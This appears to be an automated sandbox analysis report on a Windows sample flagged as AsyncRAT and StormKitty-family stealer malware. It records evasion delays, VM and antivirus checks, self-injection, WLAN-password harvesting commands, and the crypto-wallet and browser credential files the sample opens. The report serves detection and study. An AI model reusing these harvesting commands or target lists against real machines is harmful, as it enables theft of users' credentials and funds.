Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Thread delayed: delay time: 596312	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Thread delayed: delay time: 596203	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Thread delayed: delay time: 596094	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Thread delayed: delay time: 595984	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Thread delayed: delay time: 595875	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Thread delayed: delay time: 595765	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Thread delayed: delay time: 595656	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Thread delayed: delay time: 595547	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Thread delayed: delay time: 595437	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Thread delayed: delay time: 595328	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Thread delayed: delay time: 595219	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Thread delayed: delay time: 595109	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Thread delayed: delay time: 594999	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Thread delayed: delay time: 594891	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Thread delayed: delay time: 594781	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Thread delayed: delay time: 594671	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Thread delayed: delay time: 594562	Jump to behavior

Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Window / User API: threadDelayed 1626			Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Window / User API: threadDelayed 8222			Jump to behavior

Source: C:\Users\user\Desktop\FUEvp5c8lO.exe TID: 7948	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe TID: 6044	Thread sleep time: -32281802128991695s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe TID: 6044	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe TID: 6044	Thread sleep time: -599875s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe TID: 6044	Thread sleep time: -599766s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe TID: 6044	Thread sleep time: -599656s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe TID: 6044	Thread sleep time: -599547s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe TID: 6044	Thread sleep time: -599437s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe TID: 6044	Thread sleep time: -599328s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe TID: 6044	Thread sleep time: -599219s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe TID: 6044	Thread sleep time: -599109s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe TID: 6044	Thread sleep time: -599000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe TID: 6044	Thread sleep time: -598890s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe TID: 6044	Thread sleep time: -598779s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe TID: 6044	Thread sleep time: -598671s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe TID: 6044	Thread sleep time: -598562s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe TID: 6044	Thread sleep time: -598442s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe TID: 6044	Thread sleep time: -598312s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe TID: 6044	Thread sleep time: -598203s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe TID: 6044	Thread sleep time: -598093s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe TID: 6044	Thread sleep time: -597984s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe TID: 6044	Thread sleep time: -597875s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe TID: 6044	Thread sleep time: -597753s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe TID: 6044	Thread sleep time: -597625s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe TID: 6044	Thread sleep time: -597516s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe TID: 6044	Thread sleep time: -597406s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe TID: 6044	Thread sleep time: -597297s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe TID: 6044	Thread sleep time: -597187s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe TID: 6044	Thread sleep time: -597078s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe TID: 6044	Thread sleep time: -596969s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe TID: 6044	Thread sleep time: -596859s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe TID: 6044	Thread sleep time: -596750s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe TID: 6044	Thread sleep time: -596640s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe TID: 6044	Thread sleep time: -596531s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe TID: 6044	Thread sleep time: -596420s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe TID: 6044	Thread sleep time: -596312s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe TID: 6044	Thread sleep time: -596203s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe TID: 6044	Thread sleep time: -596094s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe TID: 6044	Thread sleep time: -595984s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe TID: 6044	Thread sleep time: -595875s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe TID: 6044	Thread sleep time: -595765s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe TID: 6044	Thread sleep time: -595656s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe TID: 6044	Thread sleep time: -595547s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe TID: 6044	Thread sleep time: -595437s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe TID: 6044	Thread sleep time: -595328s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe TID: 6044	Thread sleep time: -595219s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe TID: 6044	Thread sleep time: -595109s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe TID: 6044	Thread sleep time: -594999s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe TID: 6044	Thread sleep time: -594891s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe TID: 6044	Thread sleep time: -594781s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe TID: 6044	Thread sleep time: -594671s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe TID: 6044	Thread sleep time: -594562s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\FUEvp5c8lO.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * From Win32_ComputerSystem

Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select ProcessorId From Win32_processor

Source: C:\Users\user\Desktop\FUEvp5c8lO.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Thread delayed: delay time: 599766	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Thread delayed: delay time: 599547	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Thread delayed: delay time: 599437	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Thread delayed: delay time: 599328	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Thread delayed: delay time: 599219	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Thread delayed: delay time: 599109	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Thread delayed: delay time: 599000	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Thread delayed: delay time: 598890	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Thread delayed: delay time: 598779	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Thread delayed: delay time: 598671	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Thread delayed: delay time: 598562	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Thread delayed: delay time: 598442	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Thread delayed: delay time: 598312	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Thread delayed: delay time: 598203	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Thread delayed: delay time: 598093	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Thread delayed: delay time: 597984	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Thread delayed: delay time: 597875	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Thread delayed: delay time: 597753	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Thread delayed: delay time: 597625	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Thread delayed: delay time: 597516	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Thread delayed: delay time: 597406	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Thread delayed: delay time: 597297	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Thread delayed: delay time: 597187	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Thread delayed: delay time: 597078	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Thread delayed: delay time: 596969	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Thread delayed: delay time: 596859	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Thread delayed: delay time: 596750	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Thread delayed: delay time: 596640	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Thread delayed: delay time: 596531	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Thread delayed: delay time: 596420	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Thread delayed: delay time: 596312	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Thread delayed: delay time: 596203	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Thread delayed: delay time: 596094	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Thread delayed: delay time: 595984	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Thread delayed: delay time: 595875	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Thread delayed: delay time: 595765	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Thread delayed: delay time: 595656	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Thread delayed: delay time: 595547	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Thread delayed: delay time: 595437	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Thread delayed: delay time: 595328	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Thread delayed: delay time: 595219	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Thread delayed: delay time: 595109	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Thread delayed: delay time: 594999	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Thread delayed: delay time: 594891	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Thread delayed: delay time: 594781	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Thread delayed: delay time: 594671	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Thread delayed: delay time: 594562	Jump to behavior

Source: tmp378A.tmp.dat.3.dr	Binary or memory string: dev.azure.comVMware20,11696497155j
Source: tmp378A.tmp.dat.3.dr	Binary or memory string: global block list test formVMware20,11696497155
Source: tmp378A.tmp.dat.3.dr	Binary or memory string: turbotax.intuit.comVMware20,11696497155t
Source: tmp378A.tmp.dat.3.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696497155
Source: tmp378A.tmp.dat.3.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696497155]
Source: tmp378A.tmp.dat.3.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696497155\|UE
Source: tmp378A.tmp.dat.3.dr	Binary or memory string: tasks.office.comVMware20,11696497155o
Source: tmp378A.tmp.dat.3.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696497155
Source: tmp378A.tmp.dat.3.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696497155
Source: FUEvp5c8lO.exe, 00000003.00000002.2631220747.0000000005BF3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: tmp378A.tmp.dat.3.dr	Binary or memory string: bankofamerica.comVMware20,11696497155x
Source: tmp378A.tmp.dat.3.dr	Binary or memory string: ms.portal.azure.comVMware20,11696497155
Source: tmp378A.tmp.dat.3.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696497155h
Source: tmp378A.tmp.dat.3.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696497155p
Source: tmp378A.tmp.dat.3.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696497155n
Source: tmp378A.tmp.dat.3.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696497155d
Source: tmp378A.tmp.dat.3.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696497155x
Source: tmp378A.tmp.dat.3.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696497155
Source: FUEvp5c8lO.exe, 00000003.00000002.2622715180.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: vmware
Source: tmp378A.tmp.dat.3.dr	Binary or memory string: interactivebrokers.comVMware20,11696497155
Source: tmp378A.tmp.dat.3.dr	Binary or memory string: AMC password management pageVMware20,11696497155
Source: tmp378A.tmp.dat.3.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696497155
Source: tmp378A.tmp.dat.3.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696497155}
Source: tmp378A.tmp.dat.3.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696497155^
Source: tmp378A.tmp.dat.3.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696497155u
Source: tmp378A.tmp.dat.3.dr	Binary or memory string: discord.comVMware20,11696497155f
Source: tmp378A.tmp.dat.3.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696497155
Source: FUEvp5c8lO.exe, 00000003.00000002.2622715180.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: VMwareVBox
Source: tmp378A.tmp.dat.3.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696497155z
Source: tmp378A.tmp.dat.3.dr	Binary or memory string: outlook.office365.comVMware20,11696497155t
Source: tmp378A.tmp.dat.3.dr	Binary or memory string: outlook.office.comVMware20,11696497155s
Source: tmp378A.tmp.dat.3.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696497155}
Source: tmp378A.tmp.dat.3.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696497155~
Source: tmp378A.tmp.dat.3.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696497155x

Source: C:\Users\user\Desktop\FUEvp5c8lO.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\FUEvp5c8lO.exe

Code function: 3_2_053B0B20 LdrInitializeThunk,

3_2_053B0B20

Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\FUEvp5c8lO.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\FUEvp5c8lO.exe

Memory written: C:\Users\user\Desktop\FUEvp5c8lO.exe base: 400000 value starts with: 4D5A

Jump to behavior

Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Process created: C:\Users\user\Desktop\FUEvp5c8lO.exe "C:\Users\user\Desktop\FUEvp5c8lO.exe"	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile \| findstr All	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\chcp.com chcp 65001	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr All	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\chcp.com chcp 65001	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show networks mode=bssid	Jump to behavior

Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Queries volume information: C:\Users\user\Desktop\FUEvp5c8lO.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Queries volume information: C:\Users\user\Desktop\FUEvp5c8lO.exe VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\FUEvp5c8lO.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Yara detected AsyncRAT

Source: Yara match	File source: 0.2.FUEvp5c8lO.exe.4818348.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.FUEvp5c8lO.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.FUEvp5c8lO.exe.4843f68.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.FUEvp5c8lO.exe.4843f68.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.FUEvp5c8lO.exe.4818348.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.2622715180.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1419660864.0000000004644000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: FUEvp5c8lO.exe PID: 7920, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: FUEvp5c8lO.exe PID: 8116, type: MEMORYSTR

Uses netsh to modify the Windows network and firewall settings

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile

Source: FUEvp5c8lO.exe, 00000003.00000002.2624035937.000000000123A000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Users\user\Desktop\FUEvp5c8lO.exe

WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Stealing of Sensitive Information

Yara detected StormKitty Stealer

Source: Yara match	File source: 0.2.FUEvp5c8lO.exe.4818348.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.FUEvp5c8lO.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.FUEvp5c8lO.exe.4843f68.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.FUEvp5c8lO.exe.4843f68.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.FUEvp5c8lO.exe.4818348.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.2622715180.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2624958083.0000000002E71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1419660864.0000000004644000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: FUEvp5c8lO.exe PID: 7920, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: FUEvp5c8lO.exe PID: 8116, type: MEMORYSTR

Yara detected Telegram RAT

Source: Yara match	File source: 0.2.FUEvp5c8lO.exe.4818348.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.FUEvp5c8lO.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.FUEvp5c8lO.exe.4843f68.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.FUEvp5c8lO.exe.4843f68.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.FUEvp5c8lO.exe.4818348.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.2622715180.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1419660864.0000000004644000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: FUEvp5c8lO.exe PID: 7920, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: FUEvp5c8lO.exe PID: 8116, type: MEMORYSTR

Yara detected WorldWind Stealer

Source: Yara match

File source: Process Memory Space: FUEvp5c8lO.exe PID: 8116, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: FUEvp5c8lO.exe, 00000000.00000002.1419660864.0000000004644000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Electrum#\Electrum\wallets
Source: FUEvp5c8lO.exe, 00000000.00000002.1419660864.0000000004644000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: \bytecoinJaxxk\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb
Source: FUEvp5c8lO.exe, 00000000.00000002.1419660864.0000000004644000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Exodus+\Exodus\exodus.wallet
Source: FUEvp5c8lO.exe, 00000000.00000002.1419660864.0000000004644000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Ethereum%\Ethereum\keystore
Source: FUEvp5c8lO.exe, 00000000.00000002.1419660864.0000000004644000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Exodus+\Exodus\exodus.wallet
Source: FUEvp5c8lO.exe, 00000000.00000002.1419660864.0000000004644000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Ethereum%\Ethereum\keystore
Source: FUEvp5c8lO.exe, 00000000.00000002.1419660864.0000000004644000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Coinomi1\Coinomi\Coinomi\wallets
Source: FUEvp5c8lO.exe, 00000000.00000002.1419660864.0000000004644000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Ethereum%\Ethereum\keystore

Tries to harvest and steal WLAN passwords

Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile \| findstr All
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile \| findstr All	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile	Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
